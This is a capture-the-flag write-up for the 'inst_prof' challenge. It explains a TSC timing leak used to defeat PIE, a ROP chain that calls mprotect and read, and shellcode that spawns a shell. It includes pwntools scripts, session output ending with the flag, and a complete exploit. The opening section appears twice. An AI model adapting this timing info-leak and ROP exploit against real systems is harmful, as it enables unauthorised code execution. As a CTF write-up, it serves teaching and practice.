Summary of Exploitation:
Leak CPU Time Stamp Counter (TSC)
Predict TSC values
Leak ELF base address using predicted TSC values
Return into read_n function
ROP payload of mprotect + read to execute shellcode
Analysis:
The provided binary is a 64-bit ELF with PIE and NX enabled with below functions:
• Main function sets up alarm for 30 seconds and invokes do_test function in infinite loop
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again
Leaking CPU Time Stamp Counter (TSC):
Idea to leak pointers:
Load register R12 with a pointer fetched from stack as mov r12, [rbp-offset]. Now the program outputs (TSC – pointer loaded into R12). The problem here is both TSC and pointer in R12 are unknown values. However, we know the TSC value leaked from previous execution of loop. Let’s try to predict the current TSC value based on previous value.
TSC is measured under following conditions:
• Initial executions of do_test will take more CPU cycles due to cache effect
• Executing the do_test function multiple times will reduce the CPU cycles between loops. This is cache warming
• Do not read/write data per loop. Send all the payload once and read the output after all their executions. There should be no blocking
Consider the below code snippet:
Leaking ELF base address:
To leak the ELF base address, load R12 register with value from rbp-0x28. This holds the pointer to
Can the LSB bits also can be leaked reliably using the technique? Yes, read the pointers in two chunks. i.e. instead of reading from rbp-0x28 as below:
Once the ELF base address is leaked, a small ROP payload is setup in stack to invoke the read_n function using a series of mov operations:
Leak CPU Time Stamp Counter (TSC)
Predict TSC values
Leak ELF base address using predicted TSC values
Return into read_n function
ROP payload of mprotect + read to execute shellcode
Analysis:
The provided binary is a 64-bit ELF with PIE and NX enabled with below functions:
• Main function sets up alarm for 30 seconds and invokes do_test function in infinite loop
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again
Leaking CPU Time Stamp Counter (TSC):
.text:0000000000000B08 rdtsc ; get Time Stamp Counter .text:0000000000000B0A shl rdx, 20h .text:0000000000000B0E mov r12, rax .text:0000000000000B11 xor eax, eax .text:0000000000000B13 or r12, rdx ; load TSC values in RDX & RAX to R12 .text:0000000000000B16 call rbx ; execute the shellcode .text:0000000000000B18 rdtsc ; get Time Stamp Counter .text:0000000000000B1A mov edi, 1 .text:0000000000000B1F shl rdx, 20h .text:0000000000000B23 lea rsi, [rbp+buf] .text:0000000000000B27 or rdx, rax .text:0000000000000B2A sub rdx, r12 ; Find the difference in TSC .text:0000000000000B2D mov [rbp+buf], rdx .text:0000000000000B31 mov edx, 8 .text:0000000000000B36 call _write ; Output the resultThe TSC value is stored in R12 before execution of shellcode, later used for measuring difference as
.text:0000000000000B2A sub rdx, r12If the 4-byte user supplied code does xor r12, r12, the program outputs the entire RDX value (i.e. TSC) and goes into the next loop
Idea to leak pointers:
Load register R12 with a pointer fetched from stack as mov r12, [rbp-offset]. Now the program outputs (TSC – pointer loaded into R12). The problem here is both TSC and pointer in R12 are unknown values. However, we know the TSC value leaked from previous execution of loop. Let’s try to predict the current TSC value based on previous value.
TSC is measured under following conditions:
• Initial executions of do_test will take more CPU cycles due to cache effect
• Executing the do_test function multiple times will reduce the CPU cycles between loops. This is cache warming
• Do not read/write data per loop. Send all the payload once and read the output after all their executions. There should be no blocking
Consider the below code snippet:
for _ in range(16): payload += asm("xor r12, r12; nop") r.send(payload) tsc_values = r.recv(8 * 16) first_tsc = u64(tsc_values[0:8]) prev_tsc = first_tsc print("[+] TSC = 0x%x" % (first_tsc)) for i in range(1, 16): curr_tsc = u64(tsc_values[i*8:(i+1)*8]) diff_tsc = curr_tsc - prev_tsc prev_tsc = curr_tsc print("[+] TSC = 0x%x, diff = 0x%x" % (curr_tsc, diff_tsc))
$ python tsc_leak.py [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done [+] TSC = 0x244baebdaa75f [+] TSC = 0x244baebdc57b4, diff = 0x1b055 [+] TSC = 0x244baebdcb015, diff = 0x5861 [+] TSC = 0x244baebdcfdb8, diff = 0x4da3 [+] TSC = 0x244baebdd47d8, diff = 0x4a20 [+] TSC = 0x244baebdd9272, diff = 0x4a9a [+] TSC = 0x244baebdddd3b, diff = 0x4ac9 [+] TSC = 0x244baebde2850, diff = 0x4b15 [+] TSC = 0x244baebde7353, diff = 0x4b03 [+] TSC = 0x244baebdebf1b, diff = 0x4bc8 [+] TSC = 0x244baebdf0a4d, diff = 0x4b32 [+] TSC = 0x244baebdf56d3, diff = 0x4c86 [+] TSC = 0x244baebdfa1ec, diff = 0x4b19 [+] TSC = 0x244baebdfecdc, diff = 0x4af0 [+] TSC = 0x244baebe037b3, diff = 0x4ad7 [+] TSC = 0x244baebe08c23, diff = 0x5470After the first few executions with higher CPU cycles, the values have come down and more regular i.e. predictable with good accuracy, except for some of the LSB bits
Leaking ELF base address:
To leak the ELF base address, load R12 register with value from rbp-0x28. This holds the pointer to
.text:0000000000000B18 rdtscNow the program outputs (predicted TSC value – pointer loaded into R12), from which the pointer in R12 register can be computed. The last few bits might be inaccurate. However, the last 12 bits of the pointer are known as they are not randomized due to page alignment.
Can the LSB bits also can be leaked reliably using the technique? Yes, read the pointers in two chunks. i.e. instead of reading from rbp-0x28 as below:
gdb-peda$ x/gx $rbp-0x28 0x7fffffffde48: 0x0000555555554b18Read the pointers into halves twice. Out of 8-byte address, 2 MSB bytes are 0x00
gdb-peda$ x/gx $rbp-0x2a 0x7fffffffde46: 0x555555554b180000 gdb-peda$ x/gx $rbp-0x2d 0x7fffffffde43: 0x554b180000000000Since MSB bytes of TSC can be reliable found unlike the LSB bytes, this results in a reliable info leak. Below is the code:
for _ in range(16): payload += asm("xor r12, r12; nop") # try finding difference in execution time between do_loop to predict rdtsc output payload += asm("xor r12, r12; nop") payload += asm("xor r12, r12; nop") payload += asm("mov r12, [rbp-0x2d]") # leak 3 lsb bytes, unaligned read payload += asm("xor r12, r12; nop") payload += asm("xor r12, r12; nop") payload += asm("mov r12, [rbp-0x2a]") # leak 3 msb bytes, unaligned read print("[+] warming up cache for leaking pointers") r.send(payload) r.recv(16 * 8) # leaking pointers in two chunks to make up for less predictable LSB values of TSC t1 = u64(r.recv(8)) # leak lsb bytes t2 = u64(r.recv(8)) diff = t2 - t1 expected_value = t2 + diff t3 = u64(r.recv(8)) print("[+] leaked TSC value = 0x%x") % (t1) pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40 print("[+] pointer_lsb = 0x%x" % (pointer_lsb)) t1 = u64(r.recv(8)) # leak msb bytes t2 = u64(r.recv(8)) diff = t2 - t1 expected_value = t2 + diff t3 = u64(r.recv(8)) pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40 print("[+] pointer_msb = 0x%x" % (pointer_msb)) # .text:0000000000000B18 rdtsc pointer = (pointer_msb << 24) | pointer_lsb print("[+] leaked address = 0x%x" % (pointer)) elf_base = pointer & 0xfffffffffffff000 print("[+] ELF base address = 0x%x" % (elf_base))Gaining RIP control using relative write w.r.t RBP:
Once the ELF base address is leaked, a small ROP payload is setup in stack to invoke the read_n function using a series of mov operations:
# payload to return into read_n function payload = asm("mov r13, rsp; ret") payload += asm("mov r14, [r13]") # .text:0000000000000B18 rdtsc payload += asm("mov r14b, 0xc3; ret") # modify LSB to get pop rdi gadget payload += asm("mov r15, [rbp-0x48]") # .text:0000000000000AA3 mov[rbx-1],al payload += asm("mov r15b, 0x80; ret") # modify LSB to get read_n address payload += asm("mov [rbp+24], r15") # return into read_n payload += asm("mov [rbp+16], r13") # stack address as argument for read_n payload += asm("mov [rbp+8], r14") # overwrite RIP with pop rdi; read_n(stack_address, 0x1000) r.send(payload)RSI already holds the value 0x1000 due to the program state, hence the call becomes read_n(RSP, 0x1000). The function reads and executes a ROP payload to perform the below operations:
mprotect(elf_base, 0x1000, 7) read(0, elf_base, 0x100) jmp elf_base
$ python solver.py [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done [+] warming up cache for leaking pointers [+] leaked TSC value = 0x30aba58d51eb8 [+] pointer_lsb = 0x173b18 [+] pointer_msb = 0x55636a [+] leaked address = 0x55636a173b18 [+] ELF base address = 0x55636a173000 [+] sending ROP payload [*] Switching to interactive mode $ id uid=1337(user) gid=1337(user) groups=1337(user) $ cat flag.txt CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}Here is the full exploit:
from pwn import * host = 'inst-prof.ctfcompetition.com' port = 1337 context.arch = 'amd64' if len(sys.argv) == 2: r = process('./inst_prof') else: r = remote(host, port) r.recvline() # warmup the cache for the leaking pointers payload = '' for _ in range(16): payload += asm("xor r12, r12; nop") # try finding difference in execution time between do_loop to predict rdtsc output payload += asm("xor r12, r12; nop") payload += asm("xor r12, r12; nop") payload += asm("mov r12, [rbp-0x2d]") # leak 3 lsb bytes, unaligned read payload += asm("xor r12, r12; nop") payload += asm("xor r12, r12; nop") payload += asm("mov r12, [rbp-0x2a]") # leak 3 msb bytes, unaligned read print("[+] warming up cache for leaking pointers") r.send(payload) r.recv(16 * 8) # leaking pointers in two chunks to make up for less predictable LSB values of TSC t1 = u64(r.recv(8)) # leak lsb bytes t2 = u64(r.recv(8)) diff = t2 - t1 expected_value = t2 + diff t3 = u64(r.recv(8)) print("[+] leaked TSC value = 0x%x") % (t1) pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40 print("[+] pointer_lsb = 0x%x" % (pointer_lsb)) t1 = u64(r.recv(8)) # leak msb bytes t2 = u64(r.recv(8)) diff = t2 - t1 expected_value = t2 + diff t3 = u64(r.recv(8)) pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40 print("[+] pointer_msb = 0x%x" % (pointer_msb)) # .text:0000000000000B18 rdtsc pointer = (pointer_msb << 24) | pointer_lsb print("[+] leaked address = 0x%x" % (pointer)) elf_base = pointer & 0xfffffffffffff000 print("[+] ELF base address = 0x%x" % (elf_base)) # payload to return into read_n function payload = asm("mov r13, rsp; ret") payload += asm("mov r14, [r13]") # .text:0000000000000B18 rdtsc payload += asm("mov r14b, 0xc3; ret") # pop rdi; ret payload += asm("mov r15, [rbp-0x48]") # .text:0000000000000AA3 mov [rbx-1], al payload += asm("mov r15b, 0x80; ret") # read_n address payload += asm("mov [rbp+24], r15") # return into read_n payload += asm("mov [rbp+16], r13") # stack address payload += asm("mov [rbp+8], r14") # overwrite RIP with pop rdi; read_n(stack_address, 0x1000) r.send(payload) r.recv(8 * 8) # send ROP payload using leaked ELF base address print("[+] sending ROP payload") payload = "A" * 72 payload += p64(elf_base + 0xbba) # 0x00000bba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret payload += p64(0) payload += p64(1) payload += p64(elf_base + 0x0202028) # GOT address of alarm as NOP for call QWORD PTR [r12+rbx*8] payload += p64(0x7) # rdx payload += p64(0x1000) # rsi payload += p64(0x4545454545454545) # rdi payload += p64(elf_base + 0xba0) # __libc_csu_init payload += "F"* 8 payload += p64(0) payload += p64(1) payload += p64(elf_base + 0x0202028) # GOT address of alarm as NOP for call QWORD PTR [r12+rbx*8] payload += p64(0x100) # rdx, load registers for read payload += p64(elf_base) # rsi payload += p64(0) # rdi # make ELF header RWX payload += p64(elf_base + 0xbc3) # pop rdi; ret payload += p64(elf_base) # rdi payload += p64(elf_base + 0x820) # mprotect(elf_base, 0x1000, 7) # read into ELF header payload += p64(elf_base + 0xba0) # __libc_csu_init payload += "G" * 56 payload += p64(elf_base + 0x7e0) # read(0, elf_base, 0x100) # return to shellcode payload += p64(elf_base) payload += p64(0xdeadbeef00000000) payload += "B" * (4096 - len(payload)) r.send(payload) sc = asm(shellcraft.amd64.linux.syscall('SYS_alarm', 0)) sc += asm(shellcraft.amd64.linux.sh()) r.sendline(sc) r.interactive()